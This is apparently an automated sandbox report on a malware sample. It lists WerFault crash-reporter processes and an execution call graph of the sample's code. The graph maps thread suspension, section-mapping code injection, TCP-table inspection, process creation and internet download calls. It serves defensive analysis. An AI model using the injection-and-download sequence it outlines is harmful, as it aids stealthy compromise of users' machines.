                                                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                                                    Start time:15:27:44
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 2236
                                                                                                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    General

                                                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                                                    Start time:15:28:37
                                                                                                                                                                                                                                                    Start date:27/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):true
                                                                                                                                                                                                                                                    Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 6592 -s 1264
                                                                                                                                                                                                                                                    Imagebase:0xda0000
                                                                                                                                                                                                                                                    File size:483'680 bytes
                                                                                                                                                                                                                                                    MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Disassembly

                                                                                                                                                                                                                                                    Reset < >

                                                                                                                                                                                                                                                      Execution Graph

                                                                                                                                                                                                                                                      Execution Coverage:4.3%
                                                                                                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                                                                      Signature Coverage:37.8%
                                                                                                                                                                                                                                                      Total number of Nodes:2000
                                                                                                                                                                                                                                                      Total number of Limit Nodes:28
                                                                                                                                                                                                                                                      execution_graph 77243 2d20367 77244 2d20375 77243->77244 77257 2d20cb7 77244->77257 77246 2d2050d GetPEB 77248 2d2058a 77246->77248 77247 2d204c8 77247->77246 77256 2d207fb 77247->77256 77260 2d20a77 77248->77260 77251 2d205eb CreateThread 77252 2d205c3 77251->77252 77271 2d20927 GetPEB 77251->77271 77252->77256 77269 2d20f77 GetPEB 77252->77269 77254 2d20645 77255 2d20a77 5 API calls 77254->77255 77254->77256 77255->77256 77258 2d20cc4 77257->77258 77270 2d20cd7 GetPEB 77257->77270 77258->77247 77261 2d20a8d CreateToolhelp32Snapshot 77260->77261 77263 2d205bd 77261->77263 77264 2d20ac4 Thread32First 77261->77264 77263->77251 77263->77252 77264->77263 77266 2d20aeb 77264->77266 77265 2d20b60 Thread32Next 77265->77263 77265->77266 77266->77265 77267 2d20b22 Wow64SuspendThread 77266->77267 77268 2d20b4c CloseHandle 77266->77268 77267->77268 77268->77265 77269->77254 77270->77258 77274 2d20980 77271->77274 77272 2d209e0 CreateThread 77272->77274 77275 2d21157 77272->77275 77273 2d20a2d 77274->77272 77274->77273 77278 2dbff1c 77275->77278 77279 2dc002b 77278->77279 77280 2dbff41 77278->77280 77290 2dc11f7 77279->77290 77311 2dc279e 77280->77311 77283 2d2115c 77284 2dbff59 77284->77283 77285 2dc279e LoadLibraryA 77284->77285 77286 2dbff9b 77285->77286 77287 2dc279e LoadLibraryA 77286->77287 77288 2dbffb7 77287->77288 77289 2dc279e LoadLibraryA 77288->77289 77289->77283 77291 2dc279e LoadLibraryA 77290->77291 77292 2dc121a 77291->77292 77293 2dc279e LoadLibraryA 77292->77293 77294 2dc1232 77293->77294 77295 2dc279e LoadLibraryA 77294->77295 77296 2dc1250 77295->77296 77297 2dc1265 VirtualAlloc 77296->77297 77309 2dc1279 77296->77309 77299 2dc1293 77297->77299 77297->77309 77298 2dc279e LoadLibraryA 77301 2dc1311 77298->77301 77299->77298 77299->77309 77300 2dc279e LoadLibraryA 77304 2dc1367 77300->77304 77301->77304 77301->77309 77315 2dc25a5 77301->77315 77303 2dc13c9 77303->77309 77310 2dc142b 77303->77310 77343 2dc0387 LoadLibraryA 77303->77343 77304->77300 77304->77303 77304->77309 77306 2dc1414 77306->77309 77344 2dc0482 LoadLibraryA 77306->77344 77309->77283 77310->77309 77319 2dc1927 77310->77319 77312 2dc27b5 77311->77312 77313 2dc27dc 77312->77313 77347 2dc08a3 LoadLibraryA 77312->77347 77313->77284 77316 2dc25ba 77315->77316 77317 2dc2630 LoadLibraryA 77316->77317 77318 2dc263a 77316->77318 77317->77318 77318->77301 77320 2dc1962 77319->77320 77321 2dc19a9 NtCreateSection 77320->77321 77322 2dc19ce 77320->77322 77342 2dc1fd6 77320->77342 77321->77322 77321->77342 77323 2dc1a63 NtMapViewOfSection 77322->77323 77322->77342 77324 2dc1a83 77323->77324 77326 2dc25a5 LoadLibraryA 77324->77326 77331 2dc1d0a 77324->77331 77332 2dc2643 LoadLibraryA 77324->77332 77324->77342 77325 2dc1dac VirtualAlloc 77336 2dc1dee 77325->77336 77326->77324 77327 2dc25a5 LoadLibraryA 77327->77331 77328 2dc1e9f VirtualProtect 77330 2dc1f6a VirtualProtect 77328->77330 77338 2dc1ebf 77328->77338 77329 2dc1da8 77329->77325 77334 2dc1f99 77330->77334 77331->77325 77331->77327 77331->77329 77345 2dc2643 LoadLibraryA 77331->77345 77332->77324 77333 2dc20e4 77335 2dc20ec CreateThread 77333->77335 77333->77342 77334->77333 77334->77342 77346 2dc2358 LoadLibraryA 77334->77346 77335->77342 77336->77328 77340 2dc1e8c NtMapViewOfSection 77336->77340 77336->77342 77338->77330 77341 2dc1f44 VirtualProtect 77338->77341 77340->77328 77340->77342 77341->77338 77342->77309 77343->77306 77344->77310 77345->77331 77346->77333 77347->77312 77348 31d392a GetStartupInfoW 77349 31d39db 77348->77349 77350 31d3947 77348->77350 77350->77349 77354 31d2352 77350->77354 77352 31d396f 77352->77349 77353 31d399f GetFileType 77352->77353 77353->77352 77355 31d235e __FrameHandler3::FrameUnwindToState 77354->77355 77356 31d2388 77355->77356 77357 31d2367 77355->77357 77367 31cf5b1 RtlEnterCriticalSection 77356->77367 77375 31c4593 14 API calls __dosmaperr 77357->77375 77360 31d236c 77376 31cc0a9 40 API calls __fread_nolock 77360->77376 77362 31d2376 77362->77352 77363 31d23c0 77377 31d23e7 RtlLeaveCriticalSection std::_Lockit::~_Lockit 77363->77377 77364 31d2394 77364->77363 77368 31d22a2 77364->77368 77367->77364 77378 31d2531 77368->77378 77370 31d22c1 77386 31d258e 77370->77386 77374 31d22b4 77374->77370 77385 31d42d0 6 API calls __dosmaperr 77374->77385 77375->77360 77376->77362 77377->77362 77383 31d253e __dosmaperr 77378->77383 77379 31d257e 77393 31c4593 14 API calls __dosmaperr 77379->77393 77380 31d2569 RtlAllocateHeap 77381 31d257c 77380->77381 77380->77383 77381->77374 77383->77379 77383->77380 77392 31cc9a2 RtlEnterCriticalSection RtlLeaveCriticalSection moneypunct 77383->77392 77385->77374 77387 31d2599 RtlFreeHeap 77386->77387 77388 31d2316 77386->77388 77387->77388 77389 31d25ae GetLastError 77387->77389 77388->77364 77390 31d25bb __dosmaperr 77389->77390 77394 31c4593 14 API calls __dosmaperr 77390->77394 77392->77383 77393->77381 77394->77388 77395 317a8d0 77453 31799d0 77395->77453 77397 317a912 VirtualAlloc 77398 317a92c VirtualFree 77397->77398 77399 317a96b GetExtendedTcpTable VirtualAlloc 77397->77399 77398->77399 77400 317aa03 77399->77400 77412 317a9a5 __fread_nolock 77399->77412 77472 3179c20 77400->77472 77404 317a9b0 GetExtendedTcpTable 77406 317a9eb VirtualFree 77404->77406 77404->77412 77405 317acde 77408 318b460 42 API calls 77405->77408 77406->77397 77406->77400 77449 317acb4 77408->77449 77410 317acd6 77413 31799d0 44 API calls 77410->77413 77411 317aa25 StrStrA 77414 317acc4 GetProcessHeap HeapFree 77411->77414 77415 317aa3b StrStrA 77411->77415 77412->77404 77412->77406 77413->77405 77414->77410 77415->77414 77417 317aa52 StrStrA 77415->77417 77417->77414 77419 317aa6c MultiByteToWideChar VirtualAlloc 77417->77419 77418 317ad2a 77419->77414 77420 317aa9d __fread_nolock 77419->77420 77421 317aaa8 MultiByteToWideChar 77420->77421 77422 317aac6 VirtualFree 77421->77422 77423 317aad4 77421->77423 77422->77423 77424 317acb6 VirtualFree 77423->77424 77425 317aae6 77423->77425 77424->77414 77536 3189c80 74 API calls 77425->77536 77427 317ab12 77428 31799d0 44 API calls 77427->77428 77429 317ab24 77428->77429 77537 318b460 77429->77537 77431 317ab4c 77552 3184b60 77431->77552 77433 317ab5c 77434 317ab73 77433->77434 77435 317abfc 77433->77435 77437 318b460 42 API calls 77434->77437 77436 318b460 42 API calls 77435->77436 77438 317abef 77436->77438 77439 317ab98 77437->77439 77441 317ac86 77438->77441 77582 3187ff0 77438->77582 77440 3184b60 42 API calls 77439->77440 77442 317aba8 77440->77442 77444 317aca2 77441->77444 77448 3187ff0 40 API calls 77441->77448 77445 318b460 42 API calls 77442->77445 77587 31889a0 77444->77587 77447 317abd2 77445->77447 77450 3184b60 42 API calls 77447->77450 77448->77444 77620 31a742b 77449->77620 77451 317abe1 77450->77451 77568 3184c20 77451->77568 77459 3179a28 __fread_nolock 77453->77459 77454 3179b20 77638 3185ac0 42 API calls codecvt 77454->77638 77455 3179af9 77637 3185780 42 API calls 77455->77637 77458 3179b10 77460 3179b9d 77458->77460 77639 3187f30 77458->77639 77459->77454 77459->77455 77462 3179bbf 77460->77462 77463 3187f30 40 API calls 77460->77463 77627 3179890 77462->77627 77463->77462 77465 3179bcf 77466 3187ff0 40 API calls 77465->77466 77467 3179be8 77466->77467 77468 3187f30 40 API calls 77467->77468 77469 3179bf7 77468->77469 77470 31a742b codecvt 5 API calls 77469->77470 77471 3179c0e 77470->77471 77471->77397 77646 31893a0 77472->77646 77476 3179c8f 77667 3185820 77476->77667 77478 3179cf7 77479 3185820 42 API calls 77478->77479 77480 3179d68 77479->77480 77481 3185820 42 API calls 77480->77481 77482 3179dd0 77481->77482 77483 3185820 42 API calls 77482->77483 77484 3179e38 77483->77484 77485 3185820 42 API calls 77484->77485 77486 3179ea9 77485->77486 77681 3189b30 77486->77681 77489 3187f30 40 API calls 77490 3179f3b 77489->77490 77491 3187f30 40 API calls 77490->77491 77492 3179f53 77491->77492 77493 3187f30 40 API calls 77492->77493 77494 3179f6b 77493->77494 77495 3187f30 40 API calls 77494->77495 77496 3179f83 77495->77496 77497 3187f30 40 API calls 77496->77497 77498 3179f9b 77497->77498 77499 3187f30 40 API calls 77498->77499 77500 3179fb3 77499->77500 77501 3187f30 40 API calls 77500->77501 77502 3179fcb 77501->77502 77503 317a249 77502->77503 77507 317a021 77502->77507 77690 31768f0 42 API calls codecvt 77503->77690 77505 317a095 codecvt 77509 3185820 42 API calls 77505->77509 77506 317a24e 77507->77505 77689 31905d0 42 API calls 2 library calls 77507->77689 77510 317a10f 77509->77510 77685 3189be0 77510->77685 77513 3187f30 40 API calls 77514 317a19a 77513->77514 77515 3187f30 40 API calls 77514->77515 77516 317a1b5 CreateProcessW 77515->77516 77517 317a1e6 CloseHandle CloseHandle 77516->77517 77518 317a1fe 77516->77518 77517->77518 77519 3187f30 40 API calls 77518->77519 77520 317a214 77519->77520 77521 3187f30 40 API calls 77520->77521 77522 317a226 77521->77522 77523 31a742b codecvt 5 API calls 77522->77523 77524 317a243 77523->77524 77524->77405 77525 317a250 77524->77525 77528 317a273 77525->77528 77526 31a742b codecvt 5 API calls 77527 317a3d8 77526->77527 77527->77410 77527->77411 77529 317a2e9 GetProcessHeap 77528->77529 77535 317a394 77528->77535 77530 317a322 RtlAllocateHeap 77529->77530 77533 317a338 77530->77533 77530->77535 77531 317a396 GetLastError 77532 317a3a0 HeapFree 77531->77532 77531->77535 77532->77535 77533->77531 77534 317a353 RtlReAllocateHeap 77533->77534 77533->77535 77534->77533 77534->77535 77535->77526 77536->77427 77538 318b52d 77537->77538 77540 318b480 77537->77540 77713 31768f0 42 API calls codecvt 77538->77713 77541 318b4b4 77540->77541 77543 318b485 codecvt 77540->77543 77545 318b4fc 77540->77545 77546 318b4f3 77540->77546 77699 31a763e 77541->77699 77542 318b532 77714 3176690 42 API calls 2 library calls 77542->77714 77543->77431 77549 31a763e moneypunct 42 API calls 77545->77549 77546->77541 77546->77542 77548 318b4c7 77548->77543 77715 31cc0b9 40 API calls 2 library calls 77548->77715 77549->77543 77553 3184b9d 77552->77553 77554 3184b95 77552->77554 77556 3184bde 77553->77556 77557 3184ba5 77553->77557 77733 318abd0 42 API calls 2 library calls 77554->77733 77734 318ac80 42 API calls 77556->77734 77730 318aba0 77557->77730 77561 3187ff0 40 API calls 77563 3184bc8 77561->77563 77562 3184bf4 77735 318ad40 42 API calls codecvt 77562->77735 77563->77433 77565 3184c06 77566 31bf9ce Concurrency::cancel_current_task KiUserExceptionDispatcher 77565->77566 77567 3184c17 77566->77567 77569 3184cbc __fread_nolock 77568->77569 77570 31a763e moneypunct 42 API calls 77569->77570 77571 3184cca __fread_nolock 77570->77571 77776 31c9a4a 77571->77776 77573 3184e02 __fread_nolock 77574 31a763e moneypunct 42 API calls 77573->77574 77578 3184e63 __fread_nolock 77574->77578 77577 3187ff0 40 API calls 77581 3184f67 77577->77581 77781 3186790 77578->77781 77579 31a742b codecvt 5 API calls 77580 3184fd8 77579->77580 77580->77438 77581->77579 77583 318801d 77582->77583 77584 3188038 _Mpunct 77582->77584 77583->77584 77824 31cc0b9 40 API calls 2 library calls 77583->77824 77584->77441 77588 31889eb 77587->77588 77590 3188a2f 77588->77590 77591 3188a85 77588->77591 77594 3188be6 77588->77594 77615 3188c23 _Mpunct 77588->77615 77589 31a742b codecvt 5 API calls 77592 3188c84 77589->77592 77593 3188a5f 77590->77593 77596 3188c8d 77590->77596 77597 3188a53 77590->77597 77595 3188a9a 77591->77595 77591->77596 77613 3188aa6 77591->77613 77592->77449 77619 3188a80 77593->77619 77832 318c1e0 42 API calls 77593->77832 77598 3188c0a 77594->77598 77599 3188c3a 77594->77599 77600 3188c50 77594->77600 77601 3188c45 77594->77601 77594->77615 77833 318c0f0 42 API calls 2 library calls 77595->77833 77842 3189290 42 API calls 77596->77842 77831 318c0f0 42 API calls 2 library calls 77597->77831 77825 318c270 77598->77825 77836 31892a0 42 API calls _Mpunct 77599->77836 77837 3187dc0 77600->77837 77610 3187ff0 40 API calls 77601->77610 77610->77615 77613->77619 77834 318c1e0 42 API calls 77613->77834 77614 3184fe0 42 API calls 77614->77619 77615->77589 77616 318c1e0 42 API calls 77616->77619 77617 318c270 42 API calls 77617->77619 77618 3188bd4 77835 31892a0 42 API calls _Mpunct 77618->77835 77619->77614 77619->77616 77619->77617 77619->77618 77621 31a7433 77620->77621 77622 31a7434 IsProcessorFeaturePresent 77620->77622 77621->77418 77624 31a7476 77622->77624 77847 31a7439 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 77624->77847 77626 31a7559 77626->77418 77628 31798d1 77627->77628 77629 31798f8 WideCharToMultiByte 77627->77629 77632 31a742b codecvt 5 API calls 77628->77632 77644 3185ee0 42 API calls 3 library calls 77629->77644 77633 31799be 77632->77633 77633->77465 77635 3179927 WideCharToMultiByte 77636 3187ff0 40 API calls 77635->77636 77636->77628 77637->77458 77638->77458 77640 3187f5d 77639->77640 77641 3187f7e _Mpunct 77639->77641 77640->77641 77645 31cc0b9 40 API calls 2 library calls 77640->77645 77641->77460 77644->77635 77647 31893e5 77646->77647 77647->77647 77648 318952a 77647->77648 77653 3189489 77647->77653 77655 318945e codecvt 77647->77655 77692 31768f0 42 API calls codecvt 77648->77692 77649 31a742b codecvt 5 API calls 77651 3179c6e 77649->77651 77656 318d1e0 77651->77656 77652 318952f 77653->77655 77691 31905d0 42 API calls 2 library calls 77653->77691 77655->77649 77657 318d29d 77656->77657 77661 318d20f codecvt 77656->77661 77658 318d2ac 77657->77658 77659 318d39e 77657->77659 77693 31905d0 42 API calls 2 library calls 77658->77693 77694 31768f0 42 API calls codecvt 77659->77694 77661->77476 77665 318d2f7 codecvt 77666 318d360 codecvt _Mpunct 77665->77666 77695 31cc0b9 40 API calls 2 library calls 77665->77695 77666->77476 77668 3185887 77667->77668 77672 3185845 codecvt 77667->77672 77669 318599a 77668->77669 77670 3185896 77668->77670 77697 31768f0 42 API calls codecvt 77669->77697 77696 31905d0 42 API calls 2 library calls 77670->77696 77672->77478 77679 31858db codecvt 77680 3185950 codecvt _Mpunct 77679->77680 77698 31cc0b9 40 API calls 2 library calls 77679->77698 77680->77478 77682 3189b70 77681->77682 77682->77682 77683 3185820 42 API calls 77682->77683 77684 3179f11 77683->77684 77684->77489 77686 3189c1e 77685->77686 77687 3185820 42 API calls 77686->77687 77688 317a178 77687->77688 77688->77513 77689->77505 77690->77506 77691->77655 77692->77652 77693->77665 77694->77665 77696->77679 77697->77679 77702 31a7643 77699->77702 77701 31a765d 77701->77548 77702->77701 77704 31a765f 77702->77704 77716 31c5298 77702->77716 77727 31cc9a2 RtlEnterCriticalSection RtlLeaveCriticalSection moneypunct 77702->77727 77705 3176690 Concurrency::cancel_current_task 77704->77705 77706 31a7669 Concurrency::cancel_current_task 77704->77706 77723 31bf9ce 77705->77723 77708 31bf9ce Concurrency::cancel_current_task KiUserExceptionDispatcher 77706->77708 77710 31a7ba3 77708->77710 77709 31766ac 77726 31bf739 41 API calls 3 library calls 77709->77726 77712 31766f6 77712->77548 77713->77542 77714->77548 77718 31d3b1c __dosmaperr 77716->77718 77717 31d3b5a 77729 31c4593 14 API calls __dosmaperr 77717->77729 77718->77717 77719 31d3b45 RtlAllocateHeap 77718->77719 77728 31cc9a2 RtlEnterCriticalSection RtlLeaveCriticalSection moneypunct 77718->77728 77719->77718 77721 31d3b58 77719->77721 77721->77702 77724 31bf9e8 77723->77724 77725 31bfa15 KiUserExceptionDispatcher 77723->77725 77724->77725 77725->77709 77726->77712 77727->77702 77728->77718 77729->77721 77736 3190440 77730->77736 77732 3184bb6 77732->77561 77733->77553 77734->77562 77735->77565 77737 3190494 77736->77737 77738 31905c8 77737->77738 77739 31904f2 77737->77739 77745 31904d2 77737->77745 77769 3176c10 42 API calls 77738->77769 77741 31a763e moneypunct 42 API calls 77739->77741 77743 3190513 77741->77743 77746 3187980 77743->77746 77745->77732 77747 3187b45 77746->77747 77748 31879d7 77746->77748 77753 3187b54 77747->77753 77764 31879e3 77747->77764 77748->77747 77749 31879de 77748->77749 77750 3187ab1 77748->77750 77751 31879e5 77748->77751 77752 3187a55 77748->77752 77748->77764 77770 318abd0 42 API calls 2 library calls 77749->77770 77755 31a763e moneypunct 42 API calls 77750->77755 77756 31a763e moneypunct 42 API calls 77751->77756 77759 31a763e moneypunct 42 API calls 77752->77759 77771 3185fe0 77753->77771 77755->77764 77756->77764 77757 31a742b codecvt 5 API calls 77760 3187a4c 77757->77760 77762 3187a64 77759->77762 77760->77745 77763 318b460 42 API calls 77762->77763 77763->77764 77764->77757 77766 3187b75 77767 31bf9ce Concurrency::cancel_current_task KiUserExceptionDispatcher 77766->77767 77768 3187b86 77767->77768 77770->77764 77772 3186003 77771->77772 77772->77772 77773 318b460 42 API calls 77772->77773 77774 3186015 77773->77774 77775 318bf60 42 API calls codecvt 77774->77775 77775->77766 77785 31d3639 GetLastError 77776->77785 77782 31867c0 77781->77782 77783 31a742b codecvt 5 API calls 77782->77783 77784 3184f58 77783->77784 77784->77577 77786 31d364f 77785->77786 77787 31d3655 77785->77787 77816 31d4138 6 API calls __dosmaperr 77786->77816 77810 31d3659 SetLastError 77787->77810 77817 31d4177 6 API calls __dosmaperr 77787->77817 77790 31d3671 77792 31d2531 __dosmaperr 14 API calls 77790->77792 77790->77810 77795 31d3686 77792->77795 77793 31d36ee 77822 31cfe4d 40 API calls std::locale::_Setgloballocale 77793->77822 77794 31c9a55 77812 31d44c6 77794->77812 77796 31d369f 77795->77796 77797 31d368e 77795->77797 77819 31d4177 6 API calls __dosmaperr 77796->77819 77818 31d4177 6 API calls __dosmaperr 77797->77818 77802 31d369c 77807 31d258e ___std_exception_destroy 14 API calls 77802->77807 77803 31d36ab 77804 31d36af 77803->77804 77805 31d36c6 77803->77805 77820 31d4177 6 API calls __dosmaperr 77804->77820 77821 31d3467 14 API calls __dosmaperr 77805->77821 77807->77810 77809 31d36d1 77811 31d258e ___std_exception_destroy 14 API calls 77809->77811 77810->77793 77810->77794 77811->77810 77813 31d44d9 77812->77813 77814 31c9a65 77812->77814 77813->77814 77823 31db1a1 40 API calls 4 library calls 77813->77823 77814->77573 77816->77787 77817->77790 77818->77802 77819->77803 77820->77802 77821->77809 77823->77814 77826 318c2f9 77825->77826 77830 318c2ac _Mpunct 77825->77830 77826->77615 77827 318c270 42 API calls 77827->77830 77829 3187ff0 40 API calls 77829->77830 77830->77826 77830->77827 77830->77829 77843 3184fe0 77830->77843 77831->77593 77832->77593 77833->77613 77834->77613 77835->77594 77836->77615 77838 3187deb 77837->77838 77839 3187e08 _Mpunct 77837->77839 77838->77839 77846 31cc0b9 40 API calls 2 library calls 77838->77846 77839->77615 77844 31889a0 42 API calls 77843->77844 77845 3185019 77844->77845 77845->77830 77847->77626 77848 31a79d2 77849 31a79de __FrameHandler3::FrameUnwindToState 77848->77849 77878 31a76e4 77849->77878 77851 31a79e5 77852 31a7b3e 77851->77852 77858 31a7a0f 77851->77858 78041 31a7ee1 4 API calls 2 library calls 77852->78041 77854 31a7b45 78042 31cce8b 27 API calls std::locale::_Setgloballocale 77854->78042 77856 31a7b4b 78043 31cce4f 27 API calls std::locale::_Setgloballocale 77856->78043 77860 31a7a2e 77858->77860 77866 31a7a4e ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 77858->77866 77886 31cdbdb 77858->77886 77859 31a7b53 78044 31a8142 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 77859->78044 77863 31a7b65 __scrt_common_main_seh 77864 31a7aaf 77890 31cd677 77864->77890 77866->77864 78040 31cce65 40 API calls 4 library calls 77866->78040 77868 31a7ab5 77894 319f4c0 77868->77894 77879 31a76ed 77878->77879 78045 31a7ba4 IsProcessorFeaturePresent 77879->78045 77881 31a76f9 78046 31bf7ec 10 API calls 2 library calls 77881->78046 77883 31a76fe 77884 31a7702 77883->77884 78047 31bf80b 7 API calls 2 library calls 77883->78047 77884->77851 77887 31cdc02 77886->77887 77888 31cdbe9 77886->77888 77887->77866 77888->77887 78048 3171200 GetNativeSystemInfo 77888->78048 77891 31cd685 77890->77891 77892 31cd680 77890->77892 77891->77868 78051 31cd1ac 54 API calls 77892->78051 78052 319f2b0 77894->78052 77898 319f50b 77899 3185fe0 42 API calls 77898->77899 77900 319f52a 77899->77900 78061 3178bf0 77900->78061 77902 3185fe0 42 API calls 77931 319f7ad 77902->77931 77903 319deb0 52 API calls 77938 319f54c 77903->77938 77904 319f89b 78126 31a56c0 77904->78126 77909 31a00c0 42 API calls 77909->77938 77910 319f8c6 78151 31a59a0 77910->78151 77913 319f8da 78158 3189ee0 77913->78158 77915 31a56c0 45 API calls 77915->77938 77922 3189890 42 API calls 77923 319f938 77922->77923 77924 3189890 42 API calls 77923->77924 77926 319f951 77924->77926 78178 3185030 77926->78178 77928 319d0a0 40 API calls 77928->77931 77930 3189890 42 API calls 77933 319f974 77930->77933 77931->77904 77931->77928 78085 318a220 77931->78085 78093 318a690 77931->78093 78096 319deb0 77931->78096 78121 31a00c0 77931->78121 77932 319f786 77932->77902 77935 3185030 73 API calls 77933->77935 77934 3185fe0 42 API calls 77934->77938 77936 319f97c 77935->77936 78212 319b570 77936->78212 77938->77903 77938->77909 77938->77915 77938->77932 77938->77934 77958 319d0a0 40 API calls 77938->77958 77978 319b6b0 42 API calls 77938->77978 78543 31a0080 40 API calls 77938->78543 77943 3185030 73 API calls 77944 319f9ce 77943->77944 78455 31a5150 77944->78455 77946 319fbba 77949 3185030 73 API calls 77946->77949 77948 3189890 42 API calls 77950 319fa16 77948->77950 77951 319fbda 77949->77951 77952 3185030 73 API calls 77950->77952 77953 31a5150 42 API calls 77951->77953 77954 319fa1e 77952->77954 77955 319fbee 77953->77955 77956 31a5150 42 API calls 77954->77956 77957 319fd05 77955->77957 77960 3189890 42 API calls 77955->77960 77967 319fa32 77956->77967 77959 3185030 73 API calls 77957->77959 77958->77938 77962 319fd20 77959->77962 77961 319fc1d 77960->77961 77964 3185030 73 API calls 77961->77964 77963 31a5150 42 API calls 77962->77963 77965 319fd34 77963->77965 77966 319fc25 77964->77966 77969 319fd68 RtlExitUserThread 77965->77969 77970 319fd3b 77965->77970 77971 31a5150 42 API calls 77966->77971 77967->77946 77968 3189890 42 API calls 77967->77968 77972 319fa56 77968->77972 77973 3189890 42 API calls 77970->77973 77981 319fc39 77971->77981 77974 3189890 42 API calls 77972->77974 77975 319fd53 77973->77975 77976 319fa65 77974->77976 77977 3185030 73 API calls 77975->77977 77979 3189890 42 API calls 77976->77979 77980 319fd5b 77977->77980 77978->77938 77982 319fa74 77979->77982 78548 319e440 89 API calls 3 library calls 77980->78548 77981->77957 77984 3189890 42 API calls 77981->77984 77985 3189890 42 API calls 77982->77985 77986 319fc5d 77984->77986 77987 319fa87 77985->77987 77988 3189890 42 API calls 77986->77988 77989 3189890 42 API calls 77987->77989 77990 319fc6c 77988->77990 77991 319faa4 77989->77991 77992 3189890 42 API calls 77990->77992 77993 3185030 73 API calls 77991->77993 77994 319fc85 77992->77994 77995 319faac 77993->77995 77996 3185030 73 API calls 77994->77996 77997 3189890 42 API calls 77995->77997 77998 319fc8d 77996->77998 78000 319fac7 77997->78000 77999 3189890 42 API calls 77998->77999 78001 319fca8 77999->78001 78002 3185030 73 API calls 78000->78002 78003 3185030 73 API calls 78001->78003 78004 319facf 78002->78004 78006 319fcb0 78003->78006 78005 3189890 42 API calls 78004->78005 78007 319faee 78005->78007 78008 3189890 42 API calls 78006->78008 78009 3185030 73 API calls 78007->78009 78010 319fccc 78008->78010 78011 319faf6 78009->78011 78012 3185030 73 API calls 78010->78012 78013 3189890 42 API calls 78011->78013 78014 319fcd4 78012->78014 78015 319fb15 78013->78015 78545 31a3370 77 API calls 78014->78545 78017 3185030 73 API calls 78015->78017 78019 319fb1d 78017->78019 78018 319fce7 78546 31a2f50 110 API calls codecvt 78018->78546 78021 3189890 42 API calls 78019->78021 78023 319fb39 78021->78023 78022 319fcf6 78547 319ffb0 42 API calls 78022->78547 78025 3185030 73 API calls 78023->78025 78026 319fb41 78025->78026 78027 3189890 42 API calls 78026->78027 78028 319fb5d 78027->78028 78029 3185030 73 API calls 78028->78029 78030 319fb65 78029->78030 78031 3189890 42 API calls 78030->78031 78032 319fb81 78031->78032 78033 3185030 73 API calls 78032->78033 78034 319fb89 78033->78034 78459 3183800 78034->78459 78040->77864 78041->77854 78042->77856 78043->77859 78044->77863 78045->77881 78046->77883 78047->77884 78049 31a742b codecvt 5 API calls 78048->78049 78050 3171249 78049->78050 78050->77888 78051->77891 78549 31a9101 78052->78549 78054 319f2e7 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 78552 3176b10 78054->78552 78057 319d0a0 78058 319d0ae 78057->78058 78059 319d0b3 78057->78059 78060 3187ff0 40 API calls 78058->78060 78059->77898 78060->78059 78062 3186050 73 API calls 78061->78062 78063 3178c27 78062->78063 78561 31a71d0 GetPEB 78063->78561 78066 318b460 42 API calls 78067 3178c62 78066->78067 78572 31a6fc0 78067->78572 78070 318b460 42 API calls 78071 3178cab 78070->78071 78072 31a6fc0 45 API calls 78071->78072 78073 3178cb9 78072->78073 78074 318b460 42 API calls 78073->78074 78075 3178ce4 78074->78075 78076 31a6fc0 45 API calls 78075->78076 78077 3178cf2 78076->78077 78078 318b460 42 API calls 78077->78078 78079 3178d1d 78078->78079 78080 31a6fc0 45 API calls 78079->78080 78081 3178d2b InternetOpenA 78080->78081 78083 31a742b codecvt 5 API calls 78081->78083 78084 3178d71 78083->78084 78084->77938 78086 318a260 78085->78086 78086->78086 78087 318a2af 78086->78087 78088 318a275 78086->78088 78609 31768f0 42 API calls codecvt 78087->78609 78596 318d590 78088->78596 78091 318a2b4 78092 318a28e 78092->77931 78612 3185e00 78093->78612 78095 318a6cc 78095->77931 78097 319decb ___scrt_uninitialize_crt 78096->78097 78098 31a71d0 48 API calls 78097->78098 78099 319df14 78098->78099 78100 318b460 42 API calls 78099->78100 78101 319df41 78100->78101 78102 31a6fc0 45 API calls 78101->78102 78103 319df52 78102->78103 78104 318b460 42 API calls 78103->78104 78105 319df90 78104->78105 78106 31a6fc0 45 API calls 78105->78106 78107 319dfa1 78106->78107 78108 318b460 42 API calls 78107->78108 78109 319dfd5 78108->78109 78110 31a6fc0 45 API calls 78109->78110 78111 319dfe6 InternetOpenUrlA 78110->78111 78113 319e13c 78111->78113 78114 319e0c5 InternetReadFile 78111->78114 78118 31a742b codecvt 5 API calls 78113->78118 78114->78113 78116 319e0f0 78114->78116 78116->78113 78120 319e136 InternetReadFile 78116->78120 78635 319ef40 78116->78635 78119 319e16f 78118->78119 78119->77931 78120->78113 78120->78116 78122 31a00e4 78121->78122 78123 31a00f5 78121->78123 78122->77931 78124 318b460 42 API calls 78123->78124 78125 31a00fe 78124->78125 78125->77931 78127 319f8ab 78126->78127 78131 31a572e 78126->78131 78133 3186050 78127->78133 78129 31a588f 78129->78127 78130 318b970 42 API calls 78129->78130 78130->78129 